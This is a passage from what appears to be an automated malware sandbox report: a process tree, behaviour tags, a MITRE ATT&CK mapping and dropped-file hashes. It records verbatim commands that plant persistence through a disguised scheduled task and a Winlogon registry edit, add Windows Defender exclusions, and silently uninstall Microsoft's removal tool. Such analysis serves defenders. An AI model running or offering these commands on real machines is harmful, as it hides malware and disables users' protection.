C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Realtek HD Audio Universal Service" /tr "C:\ProgramData\Realtek HD Audio Universal Service.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:5268 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:5300
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\r.bat" "7⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\NeverLose.exe, C:\Windows\system32\userinit.exe" /f8⤵
- Modifies WinLogon for persistence
PID:1036
-
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2548
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3564
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3740
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2716
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1924
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2820
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:568
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2916
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1056
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3012
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1756
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4176
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1852
-
C:\ProgramData\svchost.exeC:\ProgramData\svchost.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4180
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2920
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4456
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:5344
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD5dd1d0b083fedf44b482a028fb70b96e8
SHA1dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA51296bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973
-
Filesize
944B
MD5871daa0605e2bf4f8259c6ed08922818
SHA18448225f10d502ce858e9f6818945bf7994d5963
SHA256d0fe73c3319af4bb23a904483ac9af46406b0b559023809daac4ab4dba0fc3e7
SHA512f97ce6108457836d2059d9ddf7272a811a3d332275f5bcc3887b18cb1b9a9e6f4359ca808302f13ef4245d4b39ac4636bd926f869cfa7851531457cf2db595ed
-
Filesize
944B
MD510fb30dc297f99d6ebafa5fee8b24fa2
SHA176904509313a49a765edcde26b69c3a61f9fa225
SHA256567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a
SHA512c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498
-
Filesize
944B
MD58ab6456a8ec71255cb9ead0bb5d27767
SHA1bc9ff860086488478e7716f7ac4421e8f69795fb
SHA256bcb14f15fbe23bf51a657c69b24f09cd51e33a2530f89ad17c44f660769611e2
SHA51287c5368dbd7c85f341edf8992d8b1c87984f9a3549a4802c6054da4e12a8674f10f56d03afc1a72b2cfc40895150d3b0f4d9d4c355c79cdf364ace35eb8ebf15
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
944B
MD53e242d3c4b39d344f66c494424020c61
SHA1194e596f33d54482e7880e91dc05e0d247a46399
SHA256f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e
SHA51227c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02
-
Filesize
944B
MD554522d22658e4f8f87ecb947b71b8feb
SHA16a6144bdf9c445099f52211b6122a2ecf72b77e9
SHA256af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a
SHA51255f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD515dde0683cd1ca19785d7262f554ba93
SHA1d039c577e438546d10ac64837b05da480d06bf69
SHA256d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA51257c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672
-
Filesize
73KB
MD59b04a3478e72178a7ca603998121546b
SHA18416891bcd883622f3a6fc40bbcb93e146891374
SHA25642c1991170efec389181d034887dbcc66897fb8e9828e51b1c80d95539b4d724
SHA5121452a0f58982ca0b5a796258f24c134d17ee0ae3a151d84e2363a1b1ff151d305c50ae455d3eb06dd0d80abdd82a5999f9eb8f98519dd6511eb4c452bfc24c71
-
Filesize
62KB
MD5d3bf4efbd73b5676b4930957fd137c78
SHA1ee088c1ad537b5a4ac8daa25b00aaa1312fe2b11
SHA2567d8033ddef68563d9fbdc9b5e5c030a39cc7e8b1828508330603931486176e13
SHA512f7132900390f99e424cbfcfab424de943b52c03e416c582f6aa892ebc9a95e8673054e06d2692a8162e5da22856fbcb6f694dc066c9fd10ae9c8e9303166ed05
-
Filesize
5.1MB
MD505d7d9a925f13945bbc1a724da0158e8
SHA160514a63bd200e29783b5e867f305033de74ac55
SHA256a6c2cefa5d79f3893bd35d7bde504390f7062e5e2db4e537a0d83085505ccf25
SHA512033117f6ab66536e1b2f8fab9beaa003c347b539f5977c3cf85bb1f64d8e8a5a80e32e6ff95dc42564567f8c94dbb197853b648700627eeb7fcd13346979d415
-
Filesize
4.9MB
MD57aeb396714a0916f251b77ba31324422
SHA1516146e2d5868a7f5f19908c1e372de803146a17
SHA256cbe2fbc428b3d679ac504eaea682d4161c251924830503760a79228d299cc412
SHA512cfae8c64c1ed50c642f38c5a20be338bb3319408d2c57b8c4473c496e8be04e25a4534184d21a64542f2b8bf18a46ed2d1d8dda4a7d7a39a79584905684e9891
-
Filesize
37B
MD58b37f03071282c420f86e7e35381e306
SHA1f1dd4f06e1955f83423dcdaf78496d9588e62c86
SHA2566b6102de698a0010cd512b4875b1ae8a7d1522ef2ebe32b41acd682926e6c752
SHA5127d01e05a5697ca684700f7395048bfe842a0059f6bd8db82f9b9060a924bd9d17b1c27209e01de92acfc7d012e81b87ec20a744c05ab89bc29e55762429f7577
-
Filesize
3.6MB
MD507244908a5e27d09bb5865611126e417
SHA1f8157b3373ab2a2b763b9778f9a42a906b1d1c86
SHA256b7a97bcb6a4a7d6df4b152f3cc117004d1f4b692b84f0a3869eaf1a087e10d27
SHA51297be32b64aa0067b9a04ce5bb8d26b1bf81617aafc949125b7fa4ca0d762638bb0fb2627c312027548c47d3e987b638c9cc7026934e91747bdbd92a7ecb67963
-
Filesize
4.8MB
MD5e7c896a9973dc414e75d1fc4c602090b
SHA1b91e0ee533dd74e08e98677503b9f6313a1f4360
SHA25620ad987a53261bee97ca29546ada7c6639deb401cdf4d50d1717ae1a7d959a1c
SHA512d960070bdb9fa9ac4e1336f4091409a1e8b2634ce7e0817dc1735c4be5d68c911ece9876420b0d972bc7d36c56d9e9fde0fc28bcbab85c9cee6866d2937c745b
-
Filesize
55KB
MD535fffdbf501a12eac2dc7d7a8ee11a25
SHA11cc39d52b436c89edb9f57460293c01ac21a533f
SHA2561c316bcb2080d70abc92440baf392d237c5429bf6c5cc7e06b270a706c7587b8
SHA5127698531a052a04245f8ee3fbdc2f883805b02a27a1741518ab8ea082649bf65193d34bcc00d57a89fa08d12251f13fd48c4d043de45d8c3b68ebd65833b7073a
-
Filesize
70KB
MD516aba8688e193f6eff4830ea0cb301b1
SHA1bb519c2a28f71b5bcf37d78e1faa73e8069b5908
SHA256c2cb03189c7b4396dd914acd11b2ea66854c2bf8238574feeae49058c765788b
SHA512cfa6d1c459690b0425e9b5ae1ee526b907e57fddf520bfe7218ef2293556ad19b6feb9f954255957b165e97191e17e3be0cd61e43efc8e26becb3fb331e2057f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.8MB
MD50bef91c9642c825a8602b4ddca6ec2cd
SHA17a29770e305794c9406bad8cf086da5c00dba76c
SHA25626bcc4d785b5f66e0a6a1f49d659cc04319078f0ab57f19ac3985118a5994d29
SHA512f393c8c89456288a30b71599c1839bc0f6807a17100845bd1cb23500347e97fee6911e215bcf787c524d64c6a571d6f0f45ed69c664032d4aff9b972dcd5b394
-
Filesize
2.8MB
MD57ec52f65f5f0846958238b0930028f01
SHA13f39b4fa0008a8a6530843da5090e32480598e5f
SHA256f31ebd2a2eda3fcc2ce646a60eb88e40cab6fdaafd77e7bcb44eed4f17059d58
SHA512d5b966f0caf0d8cd8d2aa71ee347af9f02ccd52f54bb30ec889743ce38812b9df923bd865f2eeadbc380f0d3fdd797be3d7ace31248f2804d19b80185f902d00
-
Filesize
4.6MB
MD5f2ce7ad621b1960ee24da99499dfbcbf
SHA19651c3b51ac38d372fb89f7811cf5ab3371df646
SHA25603dd1db1c02a1c104f8c5a9a5b0cdc176db1e97e94f072a1d36a42a307708c54
SHA5125986ced2827f5f44499e13fdf0a6751dc9f10fd39d1abe7dbd21da7142cddd8c24b07b882fff92e5cbda65b9036c4dad2ea0e852c34314b127b0e866f00afdea
-
Filesize
246B
MD584ec86467bb98d03b8ef15a45c4dc585
SHA197c180624264102e1e63ef0a56e876ae1554cb35
SHA256fed238459de4fc6387c44c7781ec28f36595dfc3dea361b0997e5699a139dbf1
SHA512e56b3fe53fb49f6e3b7cc4f39c9b56e67d21d0fd0fd9b464ec9ddbdce35a4c1efbacd177a0f1af486c4df8ed0ec707a7bf3ca6bb44a86194c166de8d93098da1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApplicationFrameHost.lnk
Filesize737B
MD559c200c4e6d8d9af5056fc1ac2a88eb5
SHA1ae0eda9a6e3dfa822b082d2c2e5242e60946ca3a
SHA256a2d81bebab24e24338ca80ff3aab0339ed95b0849de47723a814895170c18af9
SHA5126af0dc2b1bc50abeba355cc9df43aaca57385997bafa844e446eb267143526ef386475529234599fb22129b47bf0e49177f9dc204c1626ac08dcff5526199a97
-
Filesize
717B
MD5183d582c5dfeb0d10ae4c3c2fbf2b486
SHA1996666916a96d01bf2faffc05915ca2606dac4be
SHA2561a90c22e8fa53183c992900352f6892081b73dbb0f5feea54c43b1401852fd0f
SHA5121dcdcc11f90d78288c30404e7813e58750eeb287fc19aaf10bd73981b73e7b9f492f2eb1b386afe4a76e0abeeb8922dce10723bf6e0f7aad8a400a269bce43c7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Realtek HD Audio Universal Service.lnk
Filesize807B
MD589b11f885e794762db6927281def54d8
SHA1ba20eb1dcf0ccb20aff9f696e149e45350579f7b
SHA256833fb8aadc6be344c9567f48a74b9f9a6444388052877495b0c19ef6e934c03c
SHA512ba2675ef480c30ca59ca9948337219b74d8e41f8fbf065da8a999e7555defa028de0779080dd499832e316fa4517d73a18bc82a3613f7c6cdc92e5a88dd39dec
-
Filesize
682B
MD5e5d151a1e7b346efd86fb3d671fa36f5
SHA1cee06f1cbe4afe2a08def6b61e404e9f58df7d0c
SHA25668dc6ec7c917e974daea86e5aeea6697318bae8062659e0a67be6985501b27fa
SHA5121be1e078ee5b79a8d362f8a8f7beba6cce5e6b5548a9fd71bf07b04250e4a79f2960a699e8ca8c018b4074d2f0bc86e68f9a3deb95be3b3f2d105a1a1684b30b